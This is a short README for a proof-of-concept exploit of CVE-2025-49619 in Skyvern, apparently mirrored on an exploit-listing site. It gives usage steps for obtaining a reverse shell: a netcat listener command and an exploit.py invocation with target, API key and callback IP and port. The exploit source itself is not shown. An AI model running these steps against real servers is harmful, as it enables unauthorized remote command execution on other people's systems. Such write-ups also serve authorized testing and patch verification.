## https://sploitus.com/exploit?id=A6ADD150-2DFB-52E4-9E33-F1E36F470C44
# CVE-2025-49619 PoC
---
**This script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.**
---
## Author
- **Name:** Cristian Branet
- **GitHub:** [cristibtz](https://github.com/cristibtz)
---
## Usage
### 1. Start a listener
```bash
nc -lvnp <PORT>
```
### 2. Run the exploit
```bash
python3 exploit.py -u "http://<TARGET_IP>:<TARGET_PORT>" -k "<X-API-KEY>" -i <LOCAL_IP> -p <PORT>
```
- `<TARGET_IP>`: Skyvern server IP
- `<TARGET_PORT>`: Skyvern server port
- `<X-API-KEY>`: Your Skyvern API key (Settings โ API Key)
- `<LOCAL_IP>`: Your IP to receive the reverse shell
- `<PORT>`: Port for the reverse shell (must match your listener)
---
**Disclaimer:**
This code is for educational and authorized testing purposes only.